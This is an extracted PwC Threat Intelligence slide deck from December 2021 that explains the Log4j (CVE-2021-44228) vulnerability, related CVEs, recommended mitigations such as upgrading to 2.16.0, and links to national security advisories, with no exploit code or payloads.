Understanding the

Log4j Vulnerability
(CVE-2021-44228)

Subtitle
PwC Threat Intelligence

Updated December 17, 2021

This is the most serious
vulnerability I’ve seen in
my career. Place image to fill slide
then send to back
(Right click> Order>
Send to back)

Jen Easterly
Director, United States Cybersecurity and
Infrastructure Security Agency (CISA)
What are we seeing?
Contents

Key points

Related vulnerabilities

Recommendations

Additional resources

Understanding the Log4j Vulnerability (CVE-2021-44228) December 2021

PwC Threat Intelligence 3
Key Points

What is Apache Log4j?

Apache Log4j is a logging utility written in the Java programming language. It is used
by administrators within broader systems and web applications versus being a
standalone application or program.

How does this vulnerability work?

The vulnerability within Log4j (CVE-2021-44228/Log4Shell) allows an attacker to
remotely execute code on an impacted system. Successful exploitation, which is
trivial based on the ease of exploitation and public availability of exploit code, of this
vulnerability will give an attacker full access to a compromised system.

Why is this vulnerability so critical?

Log4j is in widespread use across numerous systems and applications. This
vulnerability is particularly concerning because exploitation is trivial, there is publicly
available exploit code, and identifying Log4j in enterprise environments may be
complex due to its prevalence in embedded applications. Additionally, multiple threat
actors are exploiting this vulnerability.

Understanding the Log4j Vulnerability (CVE-2021-44228) December 2021

PwC Threat Intelligence 4
 CVE-2021-4104 CVE-2021-45046
Log4j 1.2 has vulnerabilities that The fix to address CVE-2021-

Related result in remote code execution in a

similar fashion to CVE-2021-44228.
44228 in Apache Log4j 2.15.0
was incomplete in certain non-
Vulnerabilities Apache Log4j 1.2 reached end of
life in August 2015.
default configurations. Initially this
was only assessed to be a denial
of service vulnerability, but was
upgraded in severity after the
RCE capability was discovered

https://nvd.nist.gov/vuln/detail/CVE-2021-4104 https://nvd.nist.gov/vuln/detail/CVE-2021-45046

Understanding the Log4j Vulnerability (CVE-2021-44228) December 2021

PwC Threat Intelligence 5
Recommendations

Understand your Validate any vulnerable Upgrade to Log4j If you think you have
exposure systems have not been 2.16.0 been compromised…
compromised

Identify systems across Exploitation of this Recent analysis has Activate your incident
your enterprise that may vulnerability may have shown that the changes response (IR) plan or IR
be running vulnerable occurred as early as to 2.15.0 do not mitigate retainer.
versions of Log4j December 1, 2021. the vulnerability and that
Review logs and alerts all systems should still be
from associated systems considered vulnerable
to ensure a compromise unless 2.16.0 is
has not occurred. deployed.
Understanding the Log4j Vulnerability (CVE-2021-44228) December 2021
PwC Threat Intelligence 6
External Resources

Apache https://logging.apache.org/log4j/2.x/security.html

Microsoft https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/

CISA US https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance

NCSC UK https://www.ncsc.gov.uk/news/apache-log4j-vulnerability

ACSC AU https://www.cyber.gov.au/acsc/view-all-content/alerts/critical-remote-code-execution-vulnerability-found-
apache-log4j2-library

Cyber CA https://cyber.gc.ca/en/alerts/active-exploitation-apache-log4j-vulnerability

JPCERT https://www.jpcert.or.jp/at/2021/at210050.html

CERT NZ https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/

ANSSI https://www.cert.ssi.gouv.fr/alerte/CERTFR-2021-ALE-022/

GovtCERT CH https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

Understanding the Log4j Vulnerability (CVE-2021-44228) December 2021

PwC Threat Intelligence 7
Contact us
Sangram Gayal Prashant Mehendru
Partner, Cyber Security Executive Director, Cyber Security
sangram.gayal@pwc.com prashant.mehendru@pwc.com

www.pwc.in/consulting/cybersecurity.html

© 2021 PwC. All rights reserved. Not for further distribution without the permission of PwC. “PwC” refers to the network of member firms of PricewaterhouseCoopers
International Limited (PwCIL), or, as the context requires, individual member firms of the PwC network. Each member firm is a separate legal entity and does not act as
agent of PwCIL or any other member firm. PwCIL does not provide any services to clients. PwCIL is not responsible or liable for the acts or omissions of any of its
member firms nor can it control the exercise of their professional judgment or bind them in any way. No member firm is responsible or liable for the acts or omissions of
any other member firm nor can it control the exercise of another member firm’s professional judgment or bind another member firm or PwCIL in any way.

Understanding the Log4j Vulnerability (CVE-2021-44228) December 2021

PwC Threat Intelligence 8